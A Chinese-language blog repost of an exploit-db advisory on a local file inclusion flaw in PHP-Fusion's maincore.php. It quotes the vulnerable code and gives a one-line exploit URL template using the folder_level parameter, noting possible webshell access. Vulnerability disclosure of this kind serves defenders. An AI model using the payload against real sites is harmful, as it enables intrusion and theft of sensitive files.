PHP-Fusion 本地文件包含漏洞
发布:wpulog | 发布时间: 2010年8月16日 PHP-Fusion是一个轻量级开源内容管理系统。它采用mySQL数据库存储网站内容并提供一个简单,全面的后台管理系统。PHP-Fusion的maincore.php文件存在本地文件包含漏洞,可能导致敏感信息泄露,攻击者也可能利用该漏洞获取Webshell。
[+]info:
~~~~~~~~~
# Exploit Title: PHP-Fusion Local File Includes Vulnerability
# Author: MoDaMeR
# Email: k@live.ma
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
[+]poc:
~~~~~~~~~
maincore.php
[php]
// Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
$folder_level .= "../"; $i++;
if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----
http://{localhost}/{path}/maincore.php?folder_level=LFI
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14647
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。